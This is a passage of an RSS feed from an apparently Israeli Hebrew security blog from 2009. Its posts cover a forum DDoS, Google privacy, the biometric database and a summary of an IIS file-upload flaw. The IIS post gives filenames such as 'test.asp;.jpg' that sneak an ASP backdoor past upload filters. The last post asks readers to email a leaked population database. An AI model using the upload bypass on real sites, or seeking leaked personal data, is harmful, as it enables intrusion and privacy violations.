<p>הסיבה למעבר לכתובת היא שהחלטתי שלא הוגן שלבלוג אישי אצרוך כתובת כזאת (<a href="http://hacking.org.il" target="_self">http://hacking.org.il</a>) ועדיף שיהיה כאן משהו שקשור לקהילה ולא רק אלי אישית.</p>
<p>מה הולך להיות בכתובת הזאת? הפתעה. אתם תדעו בתוך כמה שבועות <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> .</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1218&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1218/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>&#8235;איך הוא מצליח להוציא את המדינה ככה?&#8236;</title>		<link>http://guym.co.il/1216?nucrss=1</link>
		<comments>http://guym.co.il/1216#comments</comments>
		<pubDate>Tue, 29 Dec 2009 14:31:59 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1216</guid>
		<description><![CDATA[&#8235;תגידו מה שתגידו על הלמו.
הוא כנראה אוהב פרובוקציות, כנראה אוהב להסתבך עם רשויות, כנראה עובד בדברים שהם לא 100% חביבים לסביבה (עבד עם אמיר גנץ הספאמר) וכנראה שלא נרתע מלקמט קצת את החוק אבל רק לרמה שבה הוא לא יוכל להיות מורשע.
תגידו עליו את כל זה ועוד הרבה דברים, אבל חייבים לתת לו קרדיט אחד [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1216&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>תגידו מה שתגידו על <a href="http://halemo.net" target="_blank">הלמו</a>.</p>
<p>הוא כנראה אוהב פרובוקציות, כנראה אוהב להסתבך עם רשויות, כנראה עובד בדברים שהם לא 100% חביבים לסביבה (עבד עם אמיר גנץ הספאמר) וכנראה שלא נרתע מלקמט קצת את החוק אבל רק לרמה שבה הוא לא יוכל להיות מורשע.</p>
<p>תגידו עליו את כל זה ועוד הרבה דברים, אבל חייבים לתת לו קרדיט אחד לפחות: הוא כשרוני.</p>
<p>כל פעם הוא פשוט מצליח להוציא את המדינה ואלה שעובדים ברשויות שלה (משטרה, אנשי מחשוב וכ&quot;ו) בצורה אידיוטית. לפחות פעם חשבתי ככה.</p>
<p>היום אני פשוט חושב שהעובדים האלה מתנהגים בצורה רשלנית והלמו פשוט יודע למצוא את הרשלנות שלהם ממש טוב <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>ממליץ לקרוא את זה, הסיפור הנוכחי של הלמו:</p>
<p><a href="http://halemo.net/edoar/0109/0004.html" target="_blank">http://halemo.net/edoar/0109/0004.html</a></p>
<p>למי שמתעצל ללחוץ על הלינק: איך אפשר להצפין משהו בעזרת Base64? הלמו מסביר..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1216&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1216/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>&#8235;חדש וטרי: Microsoft IIS 0Day&#8236;</title>		<link>http://guym.co.il/1213?nucrss=1</link>
		<comments>http://guym.co.il/1213#comments</comments>
		<pubDate>Mon, 28 Dec 2009 08:16:07 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1213</guid>
		<description><![CDATA[&#8235;Microsoft IIS 0Day Vulnerability in
Parsing Files
המקור פה: http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf
מדובר באפשרות לעקוף הגבלות בהעלאת קבצים לאתר.
תארו לכם אתר שמאפשר לכם להעלות אליו קובץ מסוג מסויים (נניח &#8211; JPG) וחוסם קבצי ASP או ASA כיוון שאלה קבצי הפעלה שאותם תוכלו להריץ ולפגוע בבטחון האתר.
אם תנסו להעלות את test.asp (נניח &#8211; קובץ backdoor) האתר יחזחר לכם הודעת שגיאה ויחסום [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1213&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><h1>Microsoft IIS 0Day Vulnerability in<br />
Parsing Files</h1>
<p>המקור פה:<a href="http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf" target="_blank"> http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf</a></p>
<p>מדובר באפשרות לעקוף הגבלות בהעלאת קבצים לאתר.</p>
<p>תארו לכם אתר שמאפשר לכם להעלות אליו קובץ מסוג מסויים (נניח &#8211; JPG) וחוסם קבצי ASP או ASA כיוון שאלה קבצי הפעלה שאותם תוכלו להריץ ולפגוע בבטחון האתר.</p>
<p>אם תנסו להעלות את test.asp (נניח &#8211; קובץ backdoor) האתר יחזחר לכם הודעת שגיאה ויחסום את ההעלאה.</p>
<p>אבל אם תנסו להעלות את test.asp;.jpg שרת ה-IIS יקבל את הסיומת כ-ASP בעוד האפליקציה תזהה זאת כ-jpg ולכן הקובץ לא יחסם להעלאה ואף יוכל לרוץ.</p>
<p>עוד אפשרות היא להעלות קובץ בשם test.asp:.jpg, גם במקרה זה העניין יעבוד והאפליקציה מזהה זאת כתמונה ואילו IIS מזהה את הקובץ כ-asp.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1213&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1213/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>&#8235;אתמול בלילה &#8211; DDoS מטורף על האתר ועל הפורומים.&#8236;</title>		<link>http://guym.co.il/1209?nucrss=1</link>
		<comments>http://guym.co.il/1209#comments</comments>
		<pubDate>Sat, 26 Dec 2009 16:57:00 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[ddos]]></category>
		<category><![CDATA[התקפות]]></category>
		<category><![CDATA[פריצה לבלוג]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1209</guid>
		<description><![CDATA[&#8235;אתמול בלילה שחר שלח לי SMS בערך באחת בלילה והודיע לי שהפורומים בהתקפת DDoS מטורפת.
עד שחזרתי אליו (רבע שעה אח&#34;כ) הוא כבר פתר את הבעיה וסינן את כל המפציצים.
עוד לא ניתחנו את הלוגים יותר מדי אבל מה שהיה זה מעל 100K פניות מ-4 שרתים חזקים שעשו את המתקפה (כתובות ה-IP שלהם הן 209.67.232.200, 195.138.96.153, 74.220.207.94, [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1209&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אתמול בלילה שחר שלח לי SMS בערך באחת בלילה והודיע לי שהפורומים בהתקפת DDoS מטורפת.</p>
<p>עד שחזרתי אליו (רבע שעה אח&quot;כ) הוא כבר פתר את הבעיה וסינן את כל המפציצים.</p>
<p>עוד לא ניתחנו את הלוגים יותר מדי אבל מה שהיה זה מעל 100K פניות מ-4 שרתים חזקים שעשו את המתקפה (כתובות ה-IP שלהם הן 209.67.232.200, 195.138.96.153, 74.220.207.94, 41.223.142.5).</p>
<p>הפורומים עמדו בהתקפה בצורה יפה &#8211; שחר כתב סקריפט חביב שמעיף את כל הבקשות של השרתים האלה והרים את השרת בלי בעיה רצינית והוא אפילו נהנה מזה <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>הבלוג יושב על שרת חלש יותר ולכן הוא הועף בלי בעיה תחת ההתקפה ולקח לי קצת זמן עד שהחזרתי אותו לפעולה.</p>
<p>למה זה קרה?</p>
<p>אני יכול רק לנחש שהסיבה היא החשיפה הגדולה לה זכו הפורומים בעקבות כך שהמשתמש labba מהקהילה שלנו הצליח לפרוץ את ה-DRM של ה-kindle של amazon.</p>
<p>הפורומים התפרסמו מאוד בעקבות העניין (תודה ל-labba על העבודה הנפלאה שהוא עושה בפורום) וכמות הכניסות מחו&quot;ל דרך google translate קפצה באלפי אחוזים.</p>
<p>עדכון:</p>
<p>ההתקפות חזרו היום ביתר מרץ והרבה יותר שרתים השתתפו בהתקפה.</p>
<p>שחר הצליח להתגבר על זה גם הפעם <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1209&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1209/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>&#8235;עוד סיבה לא לאהוב את גוגל וה-CEO שלה.&#8236;</title>		<link>http://guym.co.il/1206?nucrss=1</link>
		<comments>http://guym.co.il/1206#comments</comments>
		<pubDate>Tue, 15 Dec 2009 14:04:35 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[האח הגדול]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1206</guid>
		<description><![CDATA[&#8235;&#34;If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place.&#34; &#8211; כך אומר Eric Schmidt, ה-CEO של google.
ממליץ בחום לקרוא את זה:
http://www.eff.org/deeplinks/2009/12/google-ceo-eric-schmidt-dismisses-privacy
ממליץ גם לקרוא את תגובתו של Bruce Schneier:
http://www.schneier.com/blog/archives/2009/12/my_reaction_to.html
מעצבנים אותי גוגל האלה..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1206&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p><strong>&quot;If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place.&quot; &#8211; כך אומר </strong>Eric Schmidt, ה-CEO של google.</p>
<p>ממליץ בחום לקרוא את זה:</p>
<p><a href="http://www.eff.org/deeplinks/2009/12/google-ceo-eric-schmidt-dismisses-privacy" target="_blank">http://www.eff.org/deeplinks/2009/12/google-ceo-eric-schmidt-dismisses-privacy</a></p>
<p>ממליץ גם לקרוא את תגובתו של Bruce Schneier:</p>
<p><a href="http://www.schneier.com/blog/archives/2009/12/my_reaction_to.html" target="_blank">http://www.schneier.com/blog/archives/2009/12/my_reaction_to.html</a></p>
<p>מעצבנים אותי גוגל האלה..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1206&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1206/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>&#8235;דליפת המאגר הביומטרי&#8236;</title>		<link>http://guym.co.il/1204?nucrss=1</link>
		<comments>http://guym.co.il/1204#comments</comments>
		<pubDate>Thu, 10 Dec 2009 18:04:32 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[האח הגדול]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1204</guid>
		<description><![CDATA[&#8235;אני כל הזמן חושב על חבורה של האקרים שיפרצו ויגנבו את המאגר הזוועתי הזה, אבל באמת צריך שזה יקרה?
כמה פעמים דלף מרשם האוכלוסין?
אתם חושבים שביטוח לאומי יותר טוב?
משרד הבטחון בטוח לא ידליף כלום, נכון?
אז איך זה קורה?
ככה:
http://law.co.il/computer-law/digital-assistant/2009/12/10/pamta-v-michael-bronfman
פשוט מזעזע..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1204&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אני כל הזמן חושב על חבורה של האקרים שיפרצו ויגנבו את המאגר הזוועתי הזה, אבל באמת צריך שזה יקרה?</p>
<p><a href="http://ofek.biz/blog/archives/1133" target="_blank">כמה פעמים דלף מרשם האוכלוסין?</a></p>
<p><a href="http://news.walla.co.il/?w=//1191486" target="_blank">אתם חושבים שביטוח לאומי יותר טוב?</a></p>
<p><a href="http://www.nrg.co.il/online/16/ART1/939/538.html" target="_blank">משרד הבטחון בטוח לא ידליף כלום, נכון?</a></p>
<p>אז איך זה קורה?</p>
<p>ככה:</p>
<p><a href="http://law.co.il/computer-law/digital-assistant/2009/12/10/pamta-v-michael-bronfman" target="_blank">http://law.co.il/computer-law/digital-assistant/2009/12/10/pamta-v-michael-bronfman</a></p>
<p>פשוט מזעזע..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1204&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1204/feed</wfw:commentRss>
		<slash:comments>14</slash:comments>
		</item>
		<item>
		<title>&#8235;איך מזייפים/גונבים טביעת אצבע?&#8236;</title>		<link>http://guym.co.il/1194?nucrss=1</link>
		<comments>http://guym.co.il/1194#comments</comments>
		<pubDate>Tue, 08 Dec 2009 09:00:28 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[האח הגדול]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1194</guid>
		<description><![CDATA[&#8235;אז בשעה טובה (הכוונה: רעה, רעה מאוד) יש לנו חוק מאגר ביומטרי.
אז איך אפשר לזייף טביעת אצבע שמצאתם?
ככה:

גם מכסחי המיתוסים עשו עבודה:

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1194&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אז בשעה טובה (הכוונה: רעה, רעה מאוד) יש לנו חוק מאגר ביומטרי.</p>
<p>אז איך אפשר לזייף טביעת אצבע שמצאתם?</p>
<p>ככה:<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/3M8D4wWYgsc&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/3M8D4wWYgsc&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>גם מכסחי המיתוסים עשו עבודה:</p>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/LA4Xx5Noxyo&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/LA4Xx5Noxyo&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1194&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1194/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>&#8235;זה מוזר&#8230; ממשלת ארה&quot;ב מרגלת אחרי?&#8236;</title>		<link>http://guym.co.il/1196?nucrss=1</link>
		<comments>http://guym.co.il/1196#comments</comments>
		<pubDate>Tue, 08 Dec 2009 08:17:27 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1196</guid>
		<description><![CDATA[&#8235;למה שה-OUTLOOK שלי יתחבר לשם? ועוד בפורט 80?
התעבורה ממש אפסית ומוצפנת..
יאללה, תיאוריות קונספירציה בבקשה  
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1196&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p><img class="aligncenter size-full wp-image-1199" title="www.usa.gov" src="http://www.hacking.org.il/wp-content/uploads/2009/12/www.usa_.gov_1.png" alt="www.usa.gov" width="603" height="191" />למה שה-OUTLOOK שלי יתחבר לשם? ועוד בפורט 80?</p>
<p>התעבורה ממש אפסית ומוצפנת..</p>
<p>יאללה, תיאוריות קונספירציה בבקשה <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1196&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1196/feed</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>&#8235;למה גוגל מתניעה שירות DNS?&#8236;</title>		<link>http://guym.co.il/1188?nucrss=1</link>
		<comments>http://guym.co.il/1188#comments</comments>
		<pubDate>Fri, 04 Dec 2009 13:55:00 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[האח הגדול]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1188</guid>
		<description><![CDATA[&#8235;הטריגר הוא מישהו ששאל אותי בכיתה על שימוש ב-GMAIL + מייל של חבר ששלח לי לינק לכתבה על שירות חדש של גוגל &#8211; שירות DNS.
מה גוגל יכולה לדעת עליכם?
1. היא יכולה לקרוא את הדואר שלכם (GMAIL)
2. היא יודעת על כל אתר שאתם גולשים אליו ע&#34;י חיפוש ויודעת כמובן להצליב את זה עם כתובת המייל שלכם.
3. [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1188&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>הטריגר הוא מישהו ששאל אותי בכיתה על שימוש ב-GMAIL + מייל של חבר ששלח לי לינק לכתבה על שירות חדש של גוגל &#8211; שירות DNS.</p>
<h1><span style="text-decoration: underline;"><strong>מה גוגל יכולה לדעת עליכם?</strong></span></h1>
<p>1. היא יכולה לקרוא את הדואר שלכם (<strong>GMAIL</strong>)</p>
<p>2. היא יודעת על כל אתר שאתם גולשים אליו ע&quot;י חיפוש ויודעת כמובן להצליב את זה עם כתובת המייל שלכם.</p>
<p>3. היא יודעת על כל אתר שאתם גולשים אליו גם ללא חיפוש (אם אתם גולשים עם <strong>CHROME</strong> זה קל אבל אם לא, יש את Google <strong>Analytics</strong> שמותקן ב-40% מהאתרים ברשת ושלא תתבלבלו, אלה האתרים שאתם גולשים אליהם. יתר ה-60% בטח פשוט לא מתוחזקים ואתם לא מגיעים אליהם)</p>
<p>4. היא יודעת מי החברים שלכם: למי שלחתם הזמנות ל-<strong>GMAIL</strong>? מי החברים שלכם ב-<strong>google talk</strong>? למי שלחתם הזמנות ל- WAVE? מי שלח אליכם הזמנות כאלה?</p>
<p>5. היא יכולה להוציא סיסמאות של שירותים שנשלחו אליכם במייל (GMAIL).</p>
<p>6. אתם משתמשים ב-Google translate? עכשיו היא יודעת אילו שפות אתם מדברים (שפות הממשק של שירותי גוגל שבחרתם) וגם באיזה שפות אתם מעדיפים לקרוא (שפות שבחרתם לתרגם אליהם).</p>
<p>7. היא יודעת איזה אתרים אתם אוהבים וקוראים באופן קבוע (<strong>google reader</strong>).</p>
<p>8. יש לכם בלוג? הוא כמובן מאונדקס לתפארת.</p>
<p>9. <strong>google docs </strong>מאפשר להם לראות את המסמכים שכתבתם אצלהם.</p>
<p>10. <strong>google calendar </strong>אומר לגוגל איפה אתם נמצאים בכל זמן וגם עם מי אתם נפגשים.</p>
<p>11. חיפוש התמונות יצליב את המידע עליכם עם איך אתם נראים. מעניין שהם לא רכשו עדיין את face.com כדי לעשות את זה יעיל יותר.</p>
<p>12. <strong>google groups</strong> יסגיר תחומי עניין נוספים שלכם ואפילו ייתן תשובה על &quot;מה השאלות שאתם מחפשים תשובות עליהם&quot;.</p>
<p>13. אתם מפתחים? יש <strong>google code </strong>בשבילכם. הרי צריך לדעת מה אתם מפתחים, מי אוהב את זה ומתעניין בכם וכ&quot;ו.</p>
<p>14. השתמשתם ב-<strong>google mobile</strong>? מעולה. יש להם עכשיו גם את הטלפון שלכם (הם שולחים לכם באדיבות לינק ע&quot;י SMS).</p>
<p>יש עוד דבר ששכחתי?</p>
<p>אהה&#8230; <strong>DNS</strong>.</p>
<p>עכשיו הם גם יכולים להפנות אתכם לכל אתר ואז להשלים את המידע שאולי ברח להם.</p>
<h3><span style="text-decoration: underline;">אשמח לשמוע מה אתם חושבים על זה:</span></h3>
<p>1. מה השירותים (והמידע) ששכחתי להזכיר?</p>
<p>2. מה הם יכולים לעשות עם DNS? (אני מכין פוסט על זה..)</p>
<h2>תוספות:</h2>
<p><a href="http://raffon.net" target="_blank">אביב ראף </a>מפנה אותנו לשני הסרטונים האלה:<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/DEtrzdGSXCU&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/DEtrzdGSXCU&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/S3Qqc13Ihk8&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/S3Qqc13Ihk8&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>TheLeader:</p>
<p>מוסיף שיש חיפוש פרופילים: http://www.google.com/profiles?q=kevin+mitnick</p>
<p>וגם מפנה אותנו לסרט הזה שמדגים בעייתיות נוספת:<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/ncerhCLi2o0&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/ncerhCLi2o0&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Prime תורם גם הוא:<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/OgEZ72I82h4&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/OgEZ72I82h4&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/zADNlKZBqnA&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/zADNlKZBqnA&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>ו<a href="http://caspi.org.il/" target="_blank">איתן כספי</a> תורם את הלינק הזה:</p>
<p>http://www.google-watch.org</p>
<p><a href="http://www.newsgeek.co.il" target="_blank">ניוזגיק</a> כותבים באותו נושא:</p>
<p>http://www.newsgeek.co.il/google-public-dns/</p>
<p>וכמובן:<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/m800fDmPh1w&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/m800fDmPh1w&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>גוגל בתחת:<br />
<object width="560" height="340"><param name="movie" value="http://www.youtube.com/v/hrontojPWEE&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/hrontojPWEE&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1188&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1188/feed</wfw:commentRss>
		<slash:comments>38</slash:comments>
		</item>
		<item>
		<title>&#8235;אגרון 2009&#8236;</title>		<link>http://guym.co.il/1186?nucrss=1</link>
		<comments>http://guym.co.il/1186#comments</comments>
		<pubDate>Tue, 01 Dec 2009 18:22:51 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1186</guid>
		<description><![CDATA[&#8235;אני שומע יותר ויותר על זה שיש אגרון חדש, 2009, שדלף לרשת ומסתובב בכל מני מקומות.
למרות שכישורי מציאת הדברים האלה די טובים אצלי, לא מצאתי עדות אמיתית לכך.
מישהו יכול לאשש את העניין?
אם למישהו יש את זה &#8211; מייל יתקבל בברכה  
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1186&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אני שומע יותר ויותר על זה שיש אגרון חדש, 2009, שדלף לרשת ומסתובב בכל מני מקומות.</p>
<p>למרות שכישורי מציאת הדברים האלה די טובים אצלי, לא מצאתי עדות אמיתית לכך.</p>
<p>מישהו יכול לאשש את העניין?</p>
<p>אם למישהו יש את זה &#8211; מייל יתקבל בברכה <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
